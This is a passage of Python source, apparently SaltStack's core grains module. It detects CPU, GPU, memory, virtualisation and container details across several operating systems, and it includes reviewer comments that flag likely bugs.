    '''
    # Provides:
    #   num_cpus
    #   cpu_model
    grains = {}
    proc_count = os.environ.get('NUMBER_OF_PROCESSORS')
    if proc_count is not None:
        # Cast to int so that the logic isn't broken when used as a
        # conditional in templating. Also follows _linux_cpudata()
        try:
            grains['num_cpus'] = int(proc_count)
        except ValueError:
            grains['num_cpus'] = 1
    grains['cpu_model'] = __salt__['reg.read_value'](
        "HKEY_LOCAL_MACHINE",
        "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",
        "ProcessorNameString").get('vdata')
    return grains
def _linux_cpudata():
    '''
    Return some CPU information for Linux minions
    '''
    # Provides:
    #   num_cpus
    #   cpu_model
    #   cpu_flags
    grains = {}
    cpuinfo_path = '/proc/cpuinfo'
    if os.path.isfile(cpuinfo_path):
        # Walk /proc/cpuinfo one 'key : value' pair at a time.
        with salt.utils.fopen(cpuinfo_path, 'r') as cpu_fh:
            for raw_line in cpu_fh:
                fields = raw_line.split(':')
                if len(fields) < 2:
                    continue
                name = fields[0].strip()
                value = fields[1].strip()
                if name == 'processor':
                    # Entries are zero-based, so the count is last index + 1.
                    grains['num_cpus'] = int(value) + 1
                elif name == 'model name':
                    grains['cpu_model'] = value
                elif name in ('flags', 'Features'):
                    grains['cpu_flags'] = value.split()
                elif name == 'Processor':
                    # ARM kernels expose a single 'Processor' line, e.g.
                    #   Processor : ARMv6-compatible processor rev 7 (v6l)
                    grains['cpu_model'] = value.split('-')[0]
                    grains['num_cpus'] = 1
    # Safe defaults when /proc/cpuinfo was missing or had no usable data.
    grains.setdefault('num_cpus', 0)
    grains.setdefault('cpu_model', 'Unknown')
    grains.setdefault('cpu_flags', [])
    return grains
def _linux_gpu_data():
    '''
    Return GPU grains gathered by parsing ``lspci -vmm`` output.

    num_gpus: int
    gpus:
      - vendor: nvidia|amd|ati|...
        model: string
    '''
    # Both opts act as kill switches; either disables GPU detection entirely.
    if __opts__.get('enable_lspci', True) is False:
        return {}

    if __opts__.get('enable_gpu_grains', True) is False:
        return {}

    lspci = salt.utils.which('lspci')
    if not lspci:
        log.debug(
            'The `lspci` binary is not available on the system. GPU grains '
            'will not be available.'
        )
        return {}

    # dominant gpu vendors to search for (MUST be lowercase for matching below)
    known_vendors = ['nvidia', 'amd', 'ati', 'intel']
    gpu_classes = ('vga compatible controller', '3d controller')

    devs = []
    try:
        lspci_out = __salt__['cmd.run']('{0} -vmm'.format(lspci))

        # lspci -vmm emits blank-line-separated records of 'Key:\tValue'
        # pairs; accumulate one record into cur_dev, flush on blank line.
        cur_dev = {}
        error = False
        # Add a blank element to the lspci_out.splitlines() list,
        # otherwise the last device is not evaluated as a cur_dev and ignored.
        lspci_list = lspci_out.splitlines()
        lspci_list.append('')
        for line in lspci_list:
            # check for record-separating empty lines
            if line == '':
                if cur_dev.get('Class', '').lower() in gpu_classes:
                    devs.append(cur_dev)
                cur_dev = {}
                continue
            if re.match(r'^\w+:\s+.*', line):
                key, val = line.split(':', 1)
                cur_dev[key.strip()] = val.strip()
            else:
                error = True
                log.debug('Unexpected lspci output: \'{0}\''.format(line))

        if error:
            log.warning(
                'Error loading grains, unexpected linux_gpu_data output, '
                'check that you have a valid shell configured and '
                'permissions to run lspci command'
            )
    except OSError:
        # Best effort: a failed lspci run leaves devs empty -> num_gpus == 0.
        pass

    gpus = []
    for gpu in devs:
        vendor_strings = gpu['Vendor'].lower().split()
        # default vendor to 'unknown', overwrite if we match a known one
        vendor = 'unknown'
        for name in known_vendors:
            # search for an 'expected' vendor name in the list of strings
            if name in vendor_strings:
                vendor = name
                break
        gpus.append({'vendor': vendor, 'model': gpu['Device']})

    grains = {}
    grains['num_gpus'] = len(gpus)
    grains['gpus'] = gpus
    return grains
def _netbsd_gpu_data():
    '''
    num_gpus: int
    gpus:
      - vendor: nvidia|amd|ati|...
        model: string
    '''
    # Vendors recognised in the pcictl listing (matched case-insensitively).
    vendor_names = ['nvidia', 'amd', 'ati', 'intel', 'cirrus logic', 'vmware']

    found = []
    try:
        listing = __salt__['cmd.run']('pcictl pci0 list')
        for entry in listing.splitlines():
            for vendor_name in vendor_names:
                hit = re.match(
                    r'[0-9:]+ ({0}) (.+) \(VGA .+\)'.format(vendor_name),
                    entry,
                    re.IGNORECASE
                )
                if hit:
                    found.append({'vendor': hit.group(1), 'model': hit.group(2)})
    except OSError:
        pass

    return {'num_gpus': len(found), 'gpus': found}
def _osx_gpudata():
    '''
    num_gpus: int
    gpus:
      - vendor: nvidia|amd|ati|...
        model: string
    '''
    detected = []
    try:
        profile = __salt__['cmd.run']('system_profiler SPDisplaysDataType')
        for entry in profile.splitlines():
            # Lines look like '      Chipset Model: Intel Iris Pro'
            label, _, value = entry.partition(': ')
            if label.strip() == "Chipset Model":
                # First word is the vendor, the remainder is the model name.
                maker, _, model = value.partition(' ')
                detected.append({'vendor': maker.lower(), 'model': model})
    except OSError:
        pass

    return {'num_gpus': len(detected), 'gpus': detected}
def _bsd_cpudata(osdata):
    '''
    Return CPU information for BSD-like systems
    '''
    # Provides:
    #   cpuarch
    #   num_cpus
    #   cpu_model
    #   cpu_flags
    sysctl = salt.utils.which('sysctl')
    arch = salt.utils.which('arch')
    cmds = {}

    if sysctl:
        cmds.update({
            'num_cpus': '{0} -n hw.ncpu'.format(sysctl),
            'cpuarch': '{0} -n hw.machine'.format(sysctl),
            'cpu_model': '{0} -n hw.model'.format(sysctl),
        })

    # OpenBSD reports the machine arch via `arch -s` rather than sysctl.
    if arch and osdata['kernel'] == 'OpenBSD':
        cmds['cpuarch'] = '{0} -s'.format(arch)

    # macOS exposes model/flags under the machdep.cpu sysctl tree.
    if osdata['kernel'] == 'Darwin':
        cmds['cpu_model'] = '{0} -n machdep.cpu.brand_string'.format(sysctl)
        cmds['cpu_flags'] = '{0} -n machdep.cpu.features'.format(sysctl)

    # Run every probe command and keep its raw stdout under the grain name.
    grains = dict([(k, __salt__['cmd.run'](v)) for k, v in six.iteritems(cmds)])

    if 'cpu_flags' in grains and isinstance(grains['cpu_flags'], six.string_types):
        grains['cpu_flags'] = grains['cpu_flags'].split(' ')

    if osdata['kernel'] == 'NetBSD':
        # NetBSD: flags come from `cpuctl identify 0` lines such as
        # 'cpu0: features 0x... <FPU,VME,...>' -- collect the <...> contents.
        grains['cpu_flags'] = []
        for line in __salt__['cmd.run']('cpuctl identify 0').splitlines():
            cpu_match = re.match(r'cpu[0-9]:\ features[0-9]?\ .+<(.+)>', line)
            if cpu_match:
                flag = cpu_match.group(1).split(',')
                grains['cpu_flags'].extend(flag)

    if osdata['kernel'] == 'FreeBSD' and os.path.isfile('/var/run/dmesg.boot'):
        grains['cpu_flags'] = []
        # TODO: at least it needs to be tested for BSD other then FreeBSD
        with salt.utils.fopen('/var/run/dmesg.boot', 'r') as _fp:
            # Tiny state machine: lines after 'CPU: ' that are still indented
            # belong to the CPU description; 'Features=...<FLAG,...>' lines
            # carry the flag list between '<' and '>'.
            cpu_here = False
            for line in _fp:
                if line.startswith('CPU: '):
                    cpu_here = True  # starts CPU descr
                    continue
                if cpu_here:
                    if not line.startswith(' '):
                        break  # game over
                    if 'Features' in line:
                        start = line.find('<')
                        end = line.find('>')
                        if start > 0 and end > 0:
                            flag = line[start + 1:end].split(',')
                            grains['cpu_flags'].extend(flag)
    # NOTE(review): if sysctl was not found, grains has no 'num_cpus' key and
    # this raises KeyError (only ValueError is caught) -- confirm intended.
    try:
        grains['num_cpus'] = int(grains['num_cpus'])
    except ValueError:
        grains['num_cpus'] = 1

    return grains
def _sunos_cpudata():
    '''
    Return the CPU information for Solaris-like systems
    '''
    # Provides:
    #   cpuarch
    #   num_cpus
    #   cpu_model
    #   cpu_flags
    grains = {'cpu_flags': []}
    grains['cpuarch'] = __salt__['cmd.run']('isainfo -k')

    # psrinfo prints one line per (virtual) processor.
    grains['num_cpus'] = len(
        __salt__['cmd.run']('/usr/sbin/psrinfo 2>/dev/null',
                            python_shell=True).splitlines()
    )

    # kstat lines look like 'cpu_info:0:cpu_info0:brand<TAB><model name>'.
    for kstat_line in __salt__['cmd.run']('kstat -p cpu_info:0:*:brand').splitlines():
        brand = re.match(r'(\w+:\d+:\w+\d+:\w+)\s+(.+)', kstat_line)
        if brand:
            grains['cpu_model'] = brand.group(2)

    # Indented isainfo lines list the supported instruction-set extensions.
    for isa_line in __salt__['cmd.run']('isainfo -n -v').splitlines():
        indented = re.match(r'^\s+(.+)', isa_line)
        if indented:
            grains['cpu_flags'].extend(indented.group(1).split())

    return grains
def _memdata(osdata):
    '''
    Gather information about the system memory
    '''
    # Provides:
    #   mem_total
    grains = {'mem_total': 0}
    if osdata['kernel'] == 'Linux':
        meminfo = '/proc/meminfo'
        if os.path.isfile(meminfo):
            with salt.utils.fopen(meminfo, 'r') as ifile:
                for line in ifile:
                    comps = line.rstrip('\n').split(':')
                    if not len(comps) > 1:
                        continue
                    if comps[0].strip() == 'MemTotal':
                        # MemTotal is reported in kB; use floor division to
                        # force output to be an integer (MiB)
                        grains['mem_total'] = int(comps[1].split()[0]) // 1024
    elif osdata['kernel'] in ('FreeBSD', 'OpenBSD', 'NetBSD', 'Darwin'):
        sysctl = salt.utils.which('sysctl')
        if sysctl:
            if osdata['kernel'] == 'Darwin':
                mem = __salt__['cmd.run']('{0} -n hw.memsize'.format(sysctl))
            else:
                mem = __salt__['cmd.run']('{0} -n hw.physmem'.format(sysctl))
            # NetBSD's 32-bit hw.physmem can overflow to a negative value;
            # retry with the 64-bit counter.
            if osdata['kernel'] == 'NetBSD' and mem.startswith('-'):
                mem = __salt__['cmd.run']('{0} -n hw.physmem64'.format(sysctl))
            # NOTE(review): true division here may yield a float, unlike the
            # Linux branch's floor division -- confirm whether intentional.
            grains['mem_total'] = int(mem) / 1024 / 1024
    elif osdata['kernel'] == 'SunOS':
        prtconf = '/usr/sbin/prtconf 2>/dev/null'
        for line in __salt__['cmd.run'](prtconf, python_shell=True).splitlines():
            # Looking for the line 'Memory size: <n> Megabytes'.
            comps = line.split(' ')
            if comps[0].strip() == 'Memory' and comps[1].strip() == 'size:':
                grains['mem_total'] = int(comps[2].strip())
    elif osdata['kernel'] == 'Windows' and HAS_WMI:
        # get the Total Physical memory as reported by msinfo32
        tot_bytes = win32api.GlobalMemoryStatusEx()['TotalPhys']
        # return memory info in gigabytes
        # NOTE(review): dividing bytes by 1024**2 yields MiB, not GiB as the
        # comment above claims -- confirm which unit callers expect.
        grains['mem_total'] = int(tot_bytes / (1024 ** 2))
    return grains
def _windows_virtual(osdata):
'''
Returns what type of virtual hardware is under the hood, kvm or physical
'''
# Provides:
# virtual
# virtual_subtype
grains = dict()
if osdata['kernel'] != 'Windows':
return grains
# It is possible that the 'manufacturer' and/or 'productname' grains
# exist but have a value of None.
manufacturer = osdata.get('manufacturer', '')
if manufacturer is None:
manufacturer = ''
productname = osdata.get('productname', '')
if productname is None:
productname = ''
if 'QEMU' in manufacturer:
# FIXME: Make this detect between kvm or qemu
grains['virtual'] = 'kvm'
if 'Bochs' in manufacturer:
grains['virtual'] = 'kvm'
# Product Name: (oVirt) www.ovirt.org
# Red Hat Community virtualization Project based on kvm
elif 'oVirt' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'oVirt'
# Red Hat Enterprise Virtualization
elif 'RHEV Hypervisor' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'rhev'
# Product Name: VirtualBox
elif 'VirtualBox' in productname:
grains['virtual'] = 'VirtualBox'
# Product Name: VMware Virtual Platform
elif 'VMware Virtual Platform' in productname:
grains['virtual'] = 'VMware'
# Manufacturer: Microsoft Corporation
# Product Name: Virtual Machine
elif 'Microsoft' in manufacturer and \
'Virtual Machine' in productname:
grains['virtual'] = 'VirtualPC'
# Manufacturer: Parallels Software International Inc.
elif 'Parallels Software' in manufacturer:
grains['virtual'] = 'Parallels'
# Apache CloudStack
elif 'CloudStack KVM Hypervisor' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'cloudstack'
return grains
def _virtual(osdata):
    '''
    Returns what type of virtual hardware is under the hood, kvm or physical
    '''
    # This is going to be a monster, if you are running a vm you can test this
    # grain with please submit patches!
    # Provides:
    #   virtual
    #   virtual_subtype
    grains = {'virtual': 'physical'}

    # Skip the below loop on platforms which have none of the desired cmds
    # This is a temporary measure until we can write proper virtual hardware
    # detection.
    skip_cmds = ('AIX',)

    # list of commands to be executed to determine the 'virtual' grain
    _cmds = ['systemd-detect-virt', 'virt-what', 'dmidecode']
    # test first for virt-what, which covers most of the desired functionality
    # on most platforms
    if not salt.utils.is_windows() and osdata['kernel'] not in skip_cmds:
        if salt.utils.which('virt-what'):
            _cmds = ['virt-what']
        else:
            log.debug(
                'Please install \'virt-what\' to improve results of the '
                '\'virtual\' grain.'
            )
    # Check if enable_lspci is True or False
    # NOTE(review): lspci is only appended when enable_lspci is *False*,
    # which contradicts the option name and comment -- confirm the intended
    # polarity of this check.
    if __opts__.get('enable_lspci', True) is False:
        # /proc/bus/pci does not exists, lspci will fail
        if os.path.exists('/proc/bus/pci'):
            _cmds += ['lspci']

    # Add additional last resort commands
    if osdata['kernel'] in skip_cmds:
        _cmds = ()

    # Quick backout for BrandZ (Solaris LX Branded zones)
    # Don't waste time trying other commands to detect the virtual grain
    uname = salt.utils.which('uname')
    if osdata['kernel'] == 'Linux' and uname:
        ret = __salt__['cmd.run_all']('{0} -v'.format(uname))
        if 'BrandZ' in ret['stdout']:
            grains['virtual'] = 'zone'
            grains.update(_mdata())
            return grains

    failed_commands = set()
    for command in _cmds:
        args = []
        # Darwin and SunOS use dedicated tools regardless of the probe list.
        if osdata['kernel'] == 'Darwin':
            command = 'system_profiler'
            args = ['SPDisplaysDataType']
        elif osdata['kernel'] == 'SunOS':
            command = 'prtdiag'
            args = []

        cmd = salt.utils.which(command)

        if not cmd:
            continue

        cmd = '{0} {1}'.format(cmd, ' '.join(args))

        try:
            ret = __salt__['cmd.run_all'](cmd)

            if ret['retcode'] > 0:
                if salt.log.is_logging_configured():
                    # systemd-detect-virt always returns > 0 on non-virtualized
                    # systems
                    # prtdiag only works in the global zone, skip if it fails
                    if salt.utils.is_windows() or 'systemd-detect-virt' in cmd or 'prtdiag' in cmd:
                        continue
                    failed_commands.add(command)
                continue
        except salt.exceptions.CommandExecutionError:
            if salt.log.is_logging_configured():
                if salt.utils.is_windows():
                    continue
                failed_commands.add(command)
            continue

        output = ret['stdout']
        if command == "system_profiler":
            # macOS: match hypervisor markers (including PCI vendor IDs
            # 0x1ab8 = Parallels, 0x15ad = VMware) in the display listing.
            macoutput = output.lower()
            if '0x1ab8' in macoutput:
                grains['virtual'] = 'Parallels'
            if 'parallels' in macoutput:
                grains['virtual'] = 'Parallels'
            if 'vmware' in macoutput:
                grains['virtual'] = 'VMware'
            if '0x15ad' in macoutput:
                grains['virtual'] = 'VMware'
            if 'virtualbox' in macoutput:
                grains['virtual'] = 'VirtualBox'
            # Break out of the loop so the next log message is not issued
            break
        elif command == 'systemd-detect-virt':
            if output in ('qemu', 'kvm', 'oracle', 'xen', 'bochs', 'chroot', 'uml', 'systemd-nspawn'):
                grains['virtual'] = output
                break
            elif 'vmware' in output:
                grains['virtual'] = 'VMware'
                break
            elif 'microsoft' in output:
                grains['virtual'] = 'VirtualPC'
                break
            elif 'lxc' in output:
                grains['virtual'] = 'LXC'
                break
            elif 'systemd-nspawn' in output:
                grains['virtual'] = 'LXC'
                break
        elif command == 'virt-what':
            if output in ('kvm', 'qemu', 'uml', 'xen', 'lxc'):
                grains['virtual'] = output
                break
            elif 'vmware' in output:
                grains['virtual'] = 'VMware'
                break
            elif 'parallels' in output:
                grains['virtual'] = 'Parallels'
                break
            elif 'hyperv' in output:
                grains['virtual'] = 'HyperV'
                break
        elif command == 'dmidecode':
            # Product Name: VirtualBox
            if 'Vendor: QEMU' in output:
                # FIXME: Make this detect between kvm or qemu
                grains['virtual'] = 'kvm'
            if 'Manufacturer: QEMU' in output:
                grains['virtual'] = 'kvm'
            if 'Vendor: Bochs' in output:
                grains['virtual'] = 'kvm'
            if 'Manufacturer: Bochs' in output:
                grains['virtual'] = 'kvm'
            if 'BHYVE' in output:
                grains['virtual'] = 'bhyve'
            # Product Name: (oVirt) www.ovirt.org
            # Red Hat Community virtualization Project based on kvm
            elif 'Manufacturer: oVirt' in output:
                grains['virtual'] = 'kvm'
                grains['virtual_subtype'] = 'ovirt'
            # Red Hat Enterprise Virtualization
            elif 'Product Name: RHEV Hypervisor' in output:
                grains['virtual'] = 'kvm'
                grains['virtual_subtype'] = 'rhev'
            elif 'VirtualBox' in output:
                grains['virtual'] = 'VirtualBox'
            # Product Name: VMware Virtual Platform
            elif 'VMware' in output:
                grains['virtual'] = 'VMware'
            # Manufacturer: Microsoft Corporation
            # Product Name: Virtual Machine
            elif ': Microsoft' in output and 'Virtual Machine' in output:
                grains['virtual'] = 'VirtualPC'
            # Manufacturer: Parallels Software International Inc.
            elif 'Parallels Software' in output:
                grains['virtual'] = 'Parallels'
            elif 'Manufacturer: Google' in output:
                grains['virtual'] = 'kvm'
            # Proxmox KVM
            elif 'Vendor: SeaBIOS' in output:
                grains['virtual'] = 'kvm'
            # Break out of the loop, lspci parsing is not necessary
            break
        elif command == 'lspci':
            # dmidecode not available or the user does not have the necessary
            # permissions
            model = output.lower()
            if 'vmware' in model:
                grains['virtual'] = 'VMware'
            # 00:04.0 System peripheral: InnoTek Systemberatung GmbH
            #         VirtualBox Guest Service
            elif 'virtualbox' in model:
                grains['virtual'] = 'VirtualBox'
            elif 'qemu' in model:
                grains['virtual'] = 'kvm'
            elif 'virtio' in model:
                grains['virtual'] = 'kvm'
            # Break out of the loop so the next log message is not issued
            break
        elif command == 'virt-what':
            # NOTE(review): unreachable -- 'virt-what' is already consumed by
            # the identical elif branch above; consider removing this one.
            # if 'virt-what' returns nothing, it's either an undetected platform
            # so we default just as virt-what to 'physical', otherwise use the
            # platform detected/returned by virt-what
            if output:
                grains['virtual'] = output.lower()
            break
        elif command == 'prtdiag':
            model = output.lower().split("\n")[0]
            if 'vmware' in model:
                grains['virtual'] = 'VMware'
            elif 'virtualbox' in model:
                grains['virtual'] = 'VirtualBox'
            elif 'qemu' in model:
                grains['virtual'] = 'kvm'
            elif 'joyent smartdc hvm' in model:
                grains['virtual'] = 'kvm'
    else:
        # for-else: runs only when no probe command hit a 'break' above.
        if osdata['kernel'] in skip_cmds:
            log.warning(
                "The tools 'dmidecode' and 'lspci' failed to "
                'execute because they do not exist on the system of the user '
                'running this instance or the user does not have the '
                'necessary permissions to execute them. Grains output might '
                'not be accurate.'
            )

    choices = ('Linux', 'OpenBSD', 'HP-UX')
    isdir = os.path.isdir
    sysctl = salt.utils.which('sysctl')
    if osdata['kernel'] in choices:
        # chroot detection: PID 1's root differing from ours implies chroot.
        if os.path.isdir('/proc'):
            try:
                self_root = os.stat('/')
                init_root = os.stat('/proc/1/root/.')
                if self_root != init_root:
                    grains['virtual_subtype'] = 'chroot'
            except (IOError, OSError):
                pass
        # Container detection via PID 1's cgroup membership.
        if os.path.isfile('/proc/1/cgroup'):
            try:
                with salt.utils.fopen('/proc/1/cgroup', 'r') as fhr:
                    if ':/lxc/' in fhr.read():
                        grains['virtual_subtype'] = 'LXC'
                with salt.utils.fopen('/proc/1/cgroup', 'r') as fhr:
                    fhr_contents = fhr.read()
                    if ':/docker/' in fhr_contents or ':/system.slice/docker' in fhr_contents:
                        grains['virtual_subtype'] = 'Docker'
            except IOError:
                pass
        if isdir('/proc/vz'):
            if os.path.isfile('/proc/vz/version'):
                grains['virtual'] = 'openvzhn'
            elif os.path.isfile('/proc/vz/veinfo'):
                grains['virtual'] = 'openvzve'
                # a posteriori, it's expected for these to have failed:
                failed_commands.discard('lspci')
                failed_commands.discard('dmidecode')
        # Provide additional detection for OpenVZ
        if os.path.isfile('/proc/self/status'):
            with salt.utils.fopen('/proc/self/status') as status_file:
                vz_re = re.compile(r'^envID:\s+(\d+)$')
                for line in status_file:
                    vz_match = vz_re.match(line.rstrip('\n'))
                    # envID 0 is the OpenVZ host node, non-zero a container.
                    if vz_match and int(vz_match.groups()[0]) != 0:
                        grains['virtual'] = 'openvzve'
                    elif vz_match and int(vz_match.groups()[0]) == 0:
                        grains['virtual'] = 'openvzhn'
        if isdir('/proc/sys/xen') or \
                isdir('/sys/bus/xen') or isdir('/proc/xen'):
            if os.path.isfile('/proc/xen/xsd_kva'):
                # Tested on CentOS 5.3 / 2.6.18-194.26.1.el5xen
                # Tested on CentOS 5.4 / 2.6.18-164.15.1.el5xen
                grains['virtual_subtype'] = 'Xen Dom0'
            else:
                if grains.get('productname', '') == 'HVM domU':
                    # Requires dmidecode!
                    grains['virtual_subtype'] = 'Xen HVM DomU'
                elif os.path.isfile('/proc/xen/capabilities') and \
                        os.access('/proc/xen/capabilities', os.R_OK):
                    with salt.utils.fopen('/proc/xen/capabilities') as fhr:
                        if 'control_d' not in fhr.read():
                            # Tested on CentOS 5.5 / 2.6.18-194.3.1.el5xen
                            grains['virtual_subtype'] = 'Xen PV DomU'
                        else:
                            # Shouldn't get to this, but just in case
                            grains['virtual_subtype'] = 'Xen Dom0'
                # Tested on Fedora 10 / 2.6.27.30-170.2.82 with xen
                # Tested on Fedora 15 / 2.6.41.4-1 without running xen
                elif isdir('/sys/bus/xen'):
                    if 'xen:' in __salt__['cmd.run']('dmesg').lower():
                        grains['virtual_subtype'] = 'Xen PV DomU'
                    elif os.listdir('/sys/bus/xen/drivers'):
                        # An actual DomU will have several drivers
                        # whereas a paravirt ops kernel will not.
                        grains['virtual_subtype'] = 'Xen PV DomU'
            # If a Dom0 or DomU was detected, obviously this is xen
            if 'dom' in grains.get('virtual_subtype', '').lower():
                grains['virtual'] = 'xen'
        if os.path.isfile('/proc/cpuinfo'):
            with salt.utils.fopen('/proc/cpuinfo', 'r') as fhr:
                if 'QEMU Virtual CPU' in fhr.read():
                    grains['virtual'] = 'kvm'
        if os.path.isfile('/sys/devices/virtual/dmi/id/product_name'):
            try:
                with salt.utils.fopen('/sys/devices/virtual/dmi/id/product_name', 'r') as fhr:
                    output = fhr.read()
                    if 'VirtualBox' in output:
                        grains['virtual'] = 'VirtualBox'
                    elif 'RHEV Hypervisor' in output:
                        grains['virtual'] = 'kvm'
                        grains['virtual_subtype'] = 'rhev'
                    elif 'oVirt Node' in output:
                        grains['virtual'] = 'kvm'
                        grains['virtual_subtype'] = 'ovirt'
                    elif 'Google' in output:
                        grains['virtual'] = 'gce'
            except IOError:
                pass
    elif osdata['kernel'] == 'FreeBSD':
        kenv = salt.utils.which('kenv')
        if kenv:
            product = __salt__['cmd.run'](
                '{0} smbios.system.product'.format(kenv)
            )
            maker = __salt__['cmd.run'](
                '{0} smbios.system.maker'.format(kenv)
            )
            if product.startswith('VMware'):
                grains['virtual'] = 'VMware'
            if product.startswith('VirtualBox'):
                grains['virtual'] = 'VirtualBox'
            if maker.startswith('Xen'):
                grains['virtual_subtype'] = '{0} {1}'.format(maker, product)
                grains['virtual'] = 'xen'
            if maker.startswith('Microsoft') and product.startswith('Virtual'):
                grains['virtual'] = 'VirtualPC'
            if maker.startswith('OpenStack'):
                grains['virtual'] = 'OpenStack'
            if maker.startswith('Bochs'):
                grains['virtual'] = 'kvm'
        if sysctl:
            hv_vendor = __salt__['cmd.run']('{0} hw.hv_vendor'.format(sysctl))
            model = __salt__['cmd.run']('{0} hw.model'.format(sysctl))
            jail = __salt__['cmd.run'](
                '{0} -n security.jail.jailed'.format(sysctl)
            )
            if 'bhyve' in hv_vendor:
                grains['virtual'] = 'bhyve'
            if jail == '1':
                grains['virtual_subtype'] = 'jail'
            if 'QEMU Virtual CPU' in model:
                grains['virtual'] = 'kvm'
    elif osdata['kernel'] == 'SunOS':
        # Check if it's a "regular" zone. (i.e. Solaris 10/11 zone)
        zonename = salt.utils.which('zonename')
        if zonename:
            zone = __salt__['cmd.run']('{0}'.format(zonename))
            if zone != 'global':
                grains['virtual'] = 'zone'
                if salt.utils.is_smartos_zone():
                    grains.update(_smartos_zone_data())
        # Check if it's a branded zone (i.e. Solaris 8/9 zone)
        if isdir('/.SUNWnative'):
            grains['virtual'] = 'zone'
    elif osdata['kernel'] == 'NetBSD':
        if sysctl:
            if 'QEMU Virtual CPU' in __salt__['cmd.run'](
                    '{0} -n machdep.cpu_brand'.format(sysctl)):
                grains['virtual'] = 'kvm'
            elif 'invalid' not in __salt__['cmd.run'](
                    '{0} -n machdep.xen.suspend'.format(sysctl)):
                grains['virtual'] = 'Xen PV DomU'
            elif 'VMware' in __salt__['cmd.run'](
                    '{0} -n machdep.dmi.system-vendor'.format(sysctl)):
                grains['virtual'] = 'VMware'
            # NetBSD has Xen dom0 support
            elif __salt__['cmd.run'](
                    '{0} -n machdep.idle-mechanism'.format(sysctl)) == 'xen':
                if os.path.isfile('/var/run/xenconsoled.pid'):
                    grains['virtual_subtype'] = 'Xen Dom0'

    for command in failed_commands:
        log.warning(
            "Although '{0}' was found in path, the current user "
            'cannot execute it. Grains output might not be '
            'accurate.'.format(command)
        )
    return grains
def _ps(osdata):
'''
Return the ps grain
'''
grains = {}
bsd_choices = ('FreeBSD', 'NetBSD', 'OpenBSD', 'MacOS')
if osdata['os'] in bsd_choices:
grains['ps'] = 'ps auxwww'
elif osdata['os_family'] == 'Solaris':
grains['ps'] = '/usr/ucb/ps auxwww'
elif osdata['os'] == 'Windows':
grains['ps'] = 'tasklist.exe'
elif osdata.get('virtual', '') == 'openvzhn':
grains['ps'] = (
'ps -fH -p $(grep -l \"^envID:[[:space:]]*0\\$\" '
'/proc/[0-9]*/status | sed -e \"s=/proc/\\([0-9]*\\)/.*=\\1=\") '
'| awk \'{ $7=\"\"; print }\''
)
else:
grains['ps'] = 'ps -efHww'
return grains
def _clean_value(key, val):
'''
Clean out well-known bogus values.
If it isn't clean (for example has value 'None'), return None.
Otherwise, return the original value.
NOTE: This logic also exists in the smbios module. This function is
for use when not using smbios to retrieve the value.
'''
if (val is None or
not len(val) or
re.match('none', val, flags=re.IGNORECASE)):
return None
elif 'uuid' in key:
# Try each version (1-5) of RFC4122 to check if it's actually a UUID
for uuidver in range(1, 5):
try:
uuid.UUID(val, version=uuidver)
return val
except ValueError:
continue
log.trace('HW {0} value {1} is an invalid UUID'.format(key, val.replace('\n', ' ')))
return None
elif re.search('serial|part|version', key):
# 'To be filled by O.E.M.
# 'Not applicable' etc.
# 'Not specified' etc.
# 0000000, 1234567 etc.
# begone!
if (re.match(r'^[0]+$', val) or
re.match(r'[0]?1234567[8]?[9]?[0]?', val) or
re.search(r'sernum|part[_-]?number|specified|filled|applicable', val, flags=re.IGNORECASE)):
return None
elif re.search('asset|manufacturer', key):
# AssetTag0. Manufacturer04. Begone.
if re.search(r'manufacturer|to be filled|available|asset|^no(ne|t)', val, flags=re.IGNORECASE):
return None
else:
# map unspecified, undefined, unknown & whatever to None
if (re.search(r'to be filled', val, flags=re.IGNORECASE) or
re.search(r'un(known|specified)|no(t|ne)? (asset|provided|defined|available|present|specified)',
val, flags=re.IGNORECASE)):
return None
return val
def _windows_platform_data():
    '''
    Use the platform module for as much as we can.

    Queries WMI (Win32_ComputerSystem, Win32_OperatingSystem, Win32_BIOS,
    Win32_TimeZone, Win32_BaseBoard) and returns a dict of Windows-specific
    grains. Returns an empty dict when the ``wmi`` module is unavailable.
    '''
    # Provides:
    #    kernelrelease
    #    osversion
    #    osrelease
    #    osservicepack
    #    osmanufacturer
    #    manufacturer
    #    productname
    #    biosversion
    #    serialnumber
    #    osfullname
    #    timezone
    #    windowsdomain
    #    motherboard.productname
    #    motherboard.serialnumber
    #    virtual
    if not HAS_WMI:
        return {}
    with salt.utils.winapi.Com():
        wmi_c = wmi.WMI()
        # http://msdn.microsoft.com/en-us/library/windows/desktop/aa394102%28v=vs.85%29.aspx
        systeminfo = wmi_c.Win32_ComputerSystem()[0]
        # https://msdn.microsoft.com/en-us/library/aa394239(v=vs.85).aspx
        osinfo = wmi_c.Win32_OperatingSystem()[0]
        # http://msdn.microsoft.com/en-us/library/windows/desktop/aa394077(v=vs.85).aspx
        biosinfo = wmi_c.Win32_BIOS()[0]
        # http://msdn.microsoft.com/en-us/library/windows/desktop/aa394498(v=vs.85).aspx
        timeinfo = wmi_c.Win32_TimeZone()[0]
        # http://msdn.microsoft.com/en-us/library/windows/desktop/aa394072(v=vs.85).aspx
        # Baseboard info may be missing (e.g. some VMs); fall back to None values.
        motherboard = {'product': None,
                       'serial': None}
        try:
            motherboardinfo = wmi_c.Win32_BaseBoard()[0]
            motherboard['product'] = motherboardinfo.Product
            motherboard['serial'] = motherboardinfo.SerialNumber
        except IndexError:
            log.debug('Motherboard info not available on this system')
        os_release = platform.release()
        info = salt.utils.win_osinfo.get_os_version_info()
        # Starting with Python 2.7.12 and 3.5.2 the `platform.uname()` function
        # started reporting the Desktop version instead of the Server version on
        # Server versions of Windows, so we need to look those up
        # Check for Python >=2.7.12 or >=3.5.2
        ver = pythonversion()['pythonversion']
        if ((six.PY2 and
             salt.utils.compare_versions(ver, '>=', [2, 7, 12, 'final', 0]))
                or
                (six.PY3 and
                 salt.utils.compare_versions(ver, '>=', [3, 5, 2, 'final', 0]))):
            # (Product Type 1 is Desktop, Everything else is Server)
            if info['ProductType'] > 1:
                server = {'Vista': '2008Server',
                          '7': '2008ServerR2',
                          '8': '2012Server',
                          '8.1': '2012ServerR2',
                          '10': '2016Server'}
                os_release = server.get(os_release,
                                        'Grain not found. Update lookup table '
                                        'in the `_windows_platform_data` '
                                        'function in `grains\\core.py`')
        # osservicepack stays None when no service pack is installed.
        service_pack = None
        if info['ServicePackMajor'] > 0:
            service_pack = ''.join(['SP', str(info['ServicePackMajor'])])
        grains = {
